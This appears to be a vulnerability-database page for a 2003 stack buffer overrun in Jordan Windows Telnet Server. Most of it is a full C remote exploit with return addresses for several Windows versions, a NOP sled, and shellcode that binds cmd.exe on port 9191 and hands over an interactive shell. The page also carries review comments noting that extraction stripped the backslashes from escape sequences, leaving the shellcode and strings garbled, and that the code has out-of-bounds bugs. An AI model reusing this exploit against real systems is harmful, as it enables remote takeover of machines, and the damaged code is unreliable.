Jordan Windows Telnet Server 1.0/1.2 – ‘Username’ Stack Buffer Overrun (2)
漏洞ID | 1054339 | 漏洞类型 | |
发布时间 | 2003-12-29 | 更新时间 | 2003-12-29 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Windows | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/9316/info
Jordan Windows Telnet Server has been reported to be prone to a remote buffer overrun vulnerability. The issue is reported to occur when a username of excessive length is supplied to the Telnet server. Because of a lack of bounds checking, when this username is copied into an insufficiently sized stack buffer, the data that exceeds the buffer's size overruns its bounds and corrupts adjacent memory. An attacker may exploit this condition to corrupt the saved instruction pointer of the vulnerable function.
/*
* Jordan's Windows Telnet server v.1.0 remote exploit
* binds cmd.exe shell on port 9191
*
* Home page: http://www.jordan.com/WindowsTelnetServer
* Advisory: http://security.nnov.ru/search/document.asp?docid=5583
*
* Tested on winxp only, but must work on other win32 systems.
*
* -d4rkgr3y [[email protected]], m00.void.ru
*
*/
#include <string.h>
#include <unistd.h>
#include <netdb.h>
/*
 * Table of selectable targets, indexed by the "os type" argument (argv[2] in
 * main()). .ret is the value main() copies into its send buffer at offset 512.
 * Only the first entry carries the author's annotation; the rest are unannotated.
 *
 * NOTE(review): usage() walks this table until .platform is NULL, but there is
 * no terminating {NULL, 0} entry, so that loop reads past the end of the array.
 * NOTE(review): main() rejects only indices > 5, while this table has 9 entries
 * (0..8) and negative indices are not rejected at all.
 */
struct
{
    char *platform;   /* label printed by usage() */
    long ret;         /* a long (8 bytes on LP64); main() copies its first 4 bytes */
}
targets[]=
{
    {"Windows XP sp0", 0x77F5801C}, // ntdll.dll : jmp esp
    {"Windows XP sp1", 0x77fb59cc},
    {"Windows 2000 SP1" , 0x77e3cb4c } ,
    {"Windows 2000 SP2" , 0x77e2492b } ,
    {"Windows 2000 SP3" , 0x77e2afc5 } ,
    {"Windows 2000 SP4" , 0x77e14c29 } ,
    {"Windows NT sp6", 0x77f0eac3},
    {"Windows 98 SE", 0x7fdabfa9},
    {"Denial-of-Service attack", 0xdefaced},
};
/*
 * Filler copied by main() into its send buffer at offset 516.
 * NOTE(review): the backslashes of the "\x90" escapes appear to have been
 * stripped by the page extraction; as printed, each "x90" is three literal
 * characters rather than one byte, so sizeof(payload) is not what the author
 * intended. Kept exactly as printed.
 */
char payload[] =
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90";
/*
 * Author-supplied shellcode, published as-is and not reviewed here; the file
 * header says it binds a shell on port 9191, which is the port main() connects
 * to afterwards. main() copies it into the send buffer at offset 548.
 * NOTE(review): as with payload[], the "\x.." escapes appear to have lost their
 * backslashes during extraction, so sizeof(w32pbshellcode)/strlen() as printed
 * are roughly three times the intended byte count. Kept exactly as printed.
 */
char w32pbshellcode[] =
"xEBx03x5DxEBx05xE8xF8xFFxFFxFFx8BxC5x83xC0x11x33"
"xC9x66xB9xC9x01x80x30x88x40xE2xFAxDDx03x64x03x7C"
"x09x64x08x88x88x88x60xC4x89x88x88x01xCEx74x77xFE"
"x74xE0x06xC6x86x64x60xD9x89x88x88x01xCEx4ExE0xBB"
"xBAx88x88xE0xFFxFBxBAxD7xDCx77xDEx4Ex01xCEx70x77"
"xFEx74xE0x25x51x8Dx46x60xB8x89x88x88x01xCEx5Ax77"
"xFEx74xE0xFAx76x3Bx9Ex60xA8x89x88x88x01xCEx46x77"
"xFEx74xE0x67x46x68xE8x60x98x89x88x88x01xCEx42x77"
"xFEx70xE0x43x65x74xB3x60x88x89x88x88x01xCEx7Cx77"
"xFEx70xE0x51x81x7Dx25x60x78x88x88x88x01xCEx78x77"
"xFEx70xE0x2Cx92xF8x4Fx60x68x88x88x88x01xCEx64x77"
"xFEx70xE0x2Cx25xA6x61x60x58x88x88x88x01xCEx60x77"
"xFEx70xE0x6DxC1x0ExC1x60x48x88x88x88x01xCEx6Ax77"
"xFEx70xE0x6FxF1x4ExF1x60x38x88x88x88x01xCEx5ExBB"
"x77x09x64x7Cx89x88x88xDCxE0x89x89x88x88x77xDEx7C"
"xD8xD8xD8xD8xC8xD8xC8xD8x77xDEx78x03x50xDFxDFxE0"
"x8Ax88xABx6Fx03x44xE2x9ExD9xDBx77xDEx64xDFxDBx77"
"xDEx60xBBx77xDFxD9xDBx77xDEx6Ax03x58x01xCEx36xE0"
"xEBxE5xECx88x01xEEx4Ax0Bx4Cx24x05xB4xACxBBx48xBB"
"x41x08x49x9Dx23x6Ax75x4ExCCxACx98xCCx76xCCxACxB5"
"x01xDCxACxC0x01xDCxACxC4x01xDCxACxD8x05xCCxACx98"
"xDCxD8xD9xD9xD9xC9xD9xC1xD9xD9x77xFEx4AxD9x77xDE"
"x46x03x44xE2x77x77xB9x77xDEx5Ax03x40x77xFEx36x77"
"xDEx5Ex63x16x77xDEx9CxDExECx29xB8x88x88x88x03xC8"
"x84x03xF8x94x25x03xC8x80xD6x4Ax8Cx88xDBxDDxDExDF"
"x03xE4xACx90x03xCDxB4x03xDCx8DxF0x8Bx5Dx03xC2x90"
"x03xD2xA8x8Bx55x6BxBAxC1x03xBCx03x8Bx7DxBBx77x74"
"xBBx48x24xB2x4CxFCx8Fx49x47x85x8Bx70x63x7AxB3xF4"
"xACx9CxFDx69x03xD2xACx8Bx55xEEx03x84xC3x03xD2x94"
"x8Bx55x03x8Cx03x8Bx4Dx63x8AxBBx48x03x5DxD7xD6xD5"
"xD3x4Ax8Cx88";
/*
 * Forward declaration without a parameter list (an unprototyped declaration);
 * the definition below takes char *progname. connect_to_host() and get_shell()
 * have no forward declaration at all, so main() calls them implicitly declared.
 * NOTE(review): the listing includes only string.h, unistd.h and netdb.h;
 * printf/exit, socket/connect, sockaddr_in, htons and select come from
 * stdio.h, stdlib.h, sys/socket.h, netinet/in.h, arpa/inet.h and sys/select.h,
 * none of which are included here.
 */
void usage();
/* Resolved host; set once in main() via gethostbyname() and read by
 * connect_to_host() through this global instead of a parameter. */
struct hostent *hp;
/*
 * Entry point: resolves argv[1], fills a 1032-byte buffer, sends it to the
 * telnet port after draining the greeting, then tries to connect to port 9191.
 *
 * argv[1]  host name or address (resolved with gethostbyname()).
 * argv[2]  index into targets[] selecting the value written at offset 512.
 * argv[3]  optional telnet port (default 23).
 *
 * NOTE(review): throughout this listing the backslashes of C escape sequences
 * ("\n", "\t", '\x41', '\x0d', ...) appear to have been stripped by the page
 * extraction; all literals are kept exactly as printed.
 */
int main(int argc, char *argv[])
{
    unsigned short port=23;
    /* NOTE(review): descriptors are held in unsigned ints yet compared with -1
     * below (works through integer conversion, but the type is misleading);
     * `addr` is never used. */
    unsigned int sock,addr,hand;
    char buf[1032], shit[666];   /* buf: bytes sent; shit: scratch for the greeting read */
    printf("n Jordan's Windows Telnet server v.1.0 remote exploitn");
    printf("ttby m00 Security // m00.void.runn");
    if(argc<3 || argc>4) usage(argv[0]);
    /* NOTE(review): targets[] has 9 entries (0..8): values 6..8 are rejected
     * although they exist, while negative values pass this test and index
     * targets[] out of bounds in the memcpy below. atoi() gives no error
     * indication for non-numeric input (it returns 0). */
    if((atoi(argv[2]))>5) usage(argv[0]);
    /* Relies on argv[argc] being NULL when no port was given (argc == 3). */
    if(argv[3]) port = atoi(argv[3]);
    memset(buf,'x41',1032);   /* 'x41' looks like '\x41' with the escape stripped */
    /* Layout: first 4 bytes of targets[].ret at 512, payload[] at 516,
     * w32pbshellcode[] at 548, then two bytes appended after the shellcode. */
    memcpy(&buf[512], (unsigned char *) &targets[atoi(argv[2])].ret, 4);   /* low 4 bytes of a long; little-endian host assumed */
    memcpy(&buf[516], payload, sizeof(payload));
    /* NOTE(review): none of these copies is checked against sizeof buf. If the
     * intended shellcode is the 484 bytes listed, 548 + 484 = 1032, so the two
     * single-byte memsets below land at buf[1032] and buf[1033], past the end
     * of buf; as printed here (escapes stripped) sizeof(w32pbshellcode) is far
     * larger still, so this memcpy itself overruns the stack buffer. */
    memcpy(&buf[548], w32pbshellcode, sizeof(w32pbshellcode));
    memset(buf+strlen(w32pbshellcode)+548,'x0d',1);   /* 'x0d'/'x0a': CR LF with escapes stripped */
    memset(buf+strlen(w32pbshellcode)+548+1,'x0a',1);
    printf("~ Resolving hostname => ");
    /* hp is the file-scope global later read by connect_to_host(). */
    if((hp=gethostbyname(argv[1]))==NULL) {
        printf("failedn");
        exit(1);
    }
    printf("donen");
    printf("~ Conneting => ");
    /* connect_to_host() is defined later without a prototype (implicit declaration). */
    if((sock=connect_to_host(port))==-1) {
        printf("failedn");
        exit(1);
    }
    printf("donen");
    printf("~ Sending exploit buffer => ");
    sleep(2);
    /* Drains up to 666 bytes of the server greeting. Neither recv() nor send()
     * return values are checked, so a failed or short send goes unnoticed. */
    recv(sock,shit,666,0);
    send(sock,buf,1032,0);
    printf("donen");
    printf("~ Connecting to bindshell => ");
    usleep(1000);   /* 1 ms; 9191 matches the port named in the file header */
    if((hand=connect_to_host(9191))==-1)
        printf("failednn");
    else {
        printf("donen~ Shell spawned on port 9191 ^ have a nice daynn");
        get_shell(hand);
    }
    close(sock);
    exit(0);
}
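/*
 * Print the command-line help and the numbered list of entries in targets[],
 * then exit.
 *
 * progname: argv[0], echoed in the usage line.
 * Never returns (calls exit(0)).
 *
 * The original loop stopped at a NULL .platform, but targets[] carries no
 * terminating entry, so it read past the end of the array; the count is now
 * derived from the array's size instead.
 * NOTE(review): the trailing "n" in the format strings look like "\n" escapes
 * whose backslashes were stripped by extraction; the literals are left as printed.
 */
void usage(char *progname)
{
    /* targets[] is a complete array type in this translation unit, so sizeof
     * yields its real element count. */
    size_t ntargets = sizeof targets / sizeof targets[0];
    printf("Usage: %s <host> <os type> [port]nnWhere 'os type' is:n",progname);
    for(size_t i = 0; i < ntargets; i++) {
        printf(" %i %sn", (int)i, targets[i].platform);   /* %i needs an int */
    }
    printf("n");
    exit(0);
}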
/*
 * Open a TCP connection to the first address of the global hp on the given
 * port (host byte order). Returns the connected socket, or -1 if socket() or
 * connect() fails; on connect failure the socket is closed first.
 * hp must already have been set by a successful gethostbyname() in main().
 */
int connect_to_host(int port)
{
    int sockt;
    struct sockaddr_in saddr;
    if((sockt=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
        return -1;
    memset((void *)&saddr, 0, sizeof(struct sockaddr_in));
    saddr.sin_family=AF_INET;
    /* NOTE(review): reads sizeof(unsigned long) bytes from a 4-byte AF_INET
     * address — on LP64 hosts that is an 8-byte read past the address, which
     * is then truncated into the 32-bit s_addr; it is also an aliasing/alignment
     * concern. Copying hp->h_length bytes with memcpy() is the conventional form. */
    saddr.sin_addr.s_addr=*((unsigned long *)hp->h_addr_list[0]);
    saddr.sin_port=htons(port);
    if(connect(sockt, (struct sockaddr *)&saddr, sizeof(saddr))<0) {
        close(sockt);
        return -1;
    } else
        return sockt;
}
/*
 * Relay loop between the local terminal (fd 0 / stdout) and the socket bsh.
 * Blocks in select() with no timeout; the loop ends when select() returns 0
 * or the most recent recv()/read() returned 0. Closes bsh and returns 1
 * (the return value is ignored by main()).
 */
int get_shell(int bsh)
{
    fd_set rfds;
    int retVal,r;
    char buf[0x31337];   /* ~197 KiB automatic buffer; only 8095 bytes are used per call */
    do {
        FD_ZERO(&rfds);
        FD_SET(0, &rfds);
        FD_SET(bsh, &rfds);
        /* NOTE(review): -1 (error) is non-zero, so the loop keeps going and
         * FD_ISSET is consulted on a set select() may not have updated. */
        retVal=select(bsh+1, &rfds, NULL, NULL, NULL);
        if(retVal) {
            if(FD_ISSET(bsh, &rfds)) {
                /* NOTE(review): the raw return value is used as the index, so
                 * -1 on error writes buf[-1]. The terminator stored is a space;
                 * this looks like '\0' with its backslash stripped by
                 * extraction — as printed, printf("%s") has no NUL to stop at. */
                buf[(r=recv(bsh, buf, 8095,0))]=' ';
                printf("%s", buf);
            }
            if(FD_ISSET(0, &rfds)) {
                buf[(r=read(0, buf, 8095))]=' ';   /* same index/terminator issue as above */
                send(bsh, buf, strlen(buf), 0);    /* strlen() depends on that terminator */
            }
        }
    } while(retVal && r);
    close(bsh);
    return 1;
}